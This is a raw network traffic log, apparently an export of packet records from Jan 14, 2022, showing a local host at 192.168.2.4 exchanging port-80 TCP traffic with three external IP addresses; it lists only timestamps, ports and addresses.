Jan 14, 2022 00:16:12.933845997 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.933928967 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.934019089 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.934135914 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.934231997 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.934326887 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.934480906 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.934683084 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.934823036 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.934932947 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.935034037 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.935136080 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.935235977 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.935340881 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.935448885 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.935545921 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.935638905 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.935731888 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.935826063 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.935939074 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.936031103 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.936126947 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.936218023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.936314106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.936408043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.936502934 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.936595917 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.936691999 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.936785936 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.936881065 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.936970949 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.937067032 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.937158108 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.937249899 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.937340975 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.937455893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.937556028 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.937839985 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.937944889 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.938045025 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.938143015 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.938245058 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.938347101 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.938450098 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.938549995 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.942071915 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.942172050 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.942280054 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.942373037 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.942456007 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.942553997 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.942651987 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.942743063 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.942837000 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.943078041 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.943216085 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.943309069 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.943412066 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.943500042 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.943598986 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.943687916 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.943782091 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.943867922 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.943955898 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.944047928 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.944137096 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.944226027 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.944315910 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.944416046 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.944529057 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.944638968 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.944726944 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.944811106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.944892883 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.944974899 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.945060968 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.945142031 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.945228100 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.945308924 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.945393085 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.945477962 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.945563078 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.945652008 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.945734024 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.956630945 CET	49912	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.968658924 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.977737904 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.977768898 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.977794886 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.977821112 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.977857113 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.977871895 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.977890968 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.977901936 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.977919102 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.977943897 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.977955103 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.977969885 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.977989912 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.977996111 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.978020906 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.978044987 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.978053093 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.978079081 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.978094101 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.978106022 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.978106976 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.978127956 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.978147984 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.978163958 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.978174925 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.978199959 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.978207111 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.978225946 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.978226900 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.978250027 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.978276014 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.978279114 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.978301048 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.978324890 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.978332043 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.978349924 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.978374004 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.978378057 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.978400946 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.978425026 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.978426933 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.978451014 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.978476048 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.978478909 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.978524923 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.978524923 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.978566885 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.978593111 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.978617907 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.978634119 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.978642941 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.978667021 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.978687048 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.978734970 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.039823055 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.039901018 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.040014029 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.042145967 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.042190075 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.042227983 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.042418003 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.043220997 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.049034119 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.049067974 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.049098969 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.049129009 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.049160957 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.049184084 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.049190998 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.049213886 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.049221992 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.049245119 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.049254894 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.049287081 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.049309015 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.049318075 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.049349070 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.049366951 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.049380064 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.049413919 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.049431086 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.049446106 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.049477100 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.049494982 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.049509048 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.049540043 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.049567938 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.049570084 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.049601078 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.049627066 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.049632072 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.049663067 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.049681902 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.049694061 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.049724102 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.049745083 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.049755096 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.049787045 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.049803972 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.049817085 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.049860001 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.049880981 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.049911976 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.049942970 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.049968958 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.049973965 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.050007105 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.050026894 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.050038099 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.050069094 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.050091028 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.050101995 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.050132036 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.050163984 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.050168037 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.050194979 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.050214052 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.050226927 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.050259113 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.050273895 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.050288916 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.050321102 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.050338984 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.050352097 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.050381899 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.050399065 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.050412893 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.050445080 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.050466061 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.050477028 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.050525904 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.055649996 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.057405949 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.057832956 CET	80	49912	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.057931900 CET	49912	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.075478077 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.075505972 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.075530052 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.075553894 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.075577021 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.075594902 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.075620890 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.075670958 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.075714111 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.075735092 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.075792074 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.106354952 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.110658884 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.110686064 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.110812902 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.121340036 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.121370077 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.121395111 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.121421099 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.121440887 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.121445894 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.121471882 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.121474028 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.121499062 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.121524096 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.121536970 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.121547937 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.121573925 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.121576071 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.121599913 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.121624947 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.121637106 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.121649027 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.121675014 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.121675968 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.121740103 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.121764898 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.121778011 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.121789932 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.121814966 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.121825933 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.121881008 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.121901035 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.121927023 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.121951103 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.121975899 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.121975899 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.122000933 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.122025013 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.122025013 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.122054100 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.122071981 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.122080088 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.122104883 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.122129917 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.122132063 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.122170925 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.122175932 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.122206926 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.122231007 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.122255087 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.122260094 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.122277975 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.122302055 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.122303963 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.122327089 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.122349024 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.122385025 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.122406960 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.122431040 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.122437954 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.122454882 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.122479916 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.122494936 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.122518063 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.122541904 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.122545004 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.122580051 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.122596979 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.122620106 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.122642994 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.122678995 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.122689962 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:13.122736931 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:13.163260937 CET	49912	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.163446903 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.163548946 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.163647890 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.163743019 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.163839102 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.163933039 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.164025068 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.164119959 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.164211988 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.164307117 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.164402962 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.164499044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.164597988 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.164695024 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.164787054 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.164880037 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.164972067 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.165081024 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.165199041 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.165298939 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.165388107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.165486097 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.165580988 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.165690899 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.165782928 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.165889978 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.165992975 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.166096926 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.166194916 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.166301012 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.166390896 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.166491985 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.166591883 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.166697025 CET	49902	80	192.168.2.4	185.215.113.35
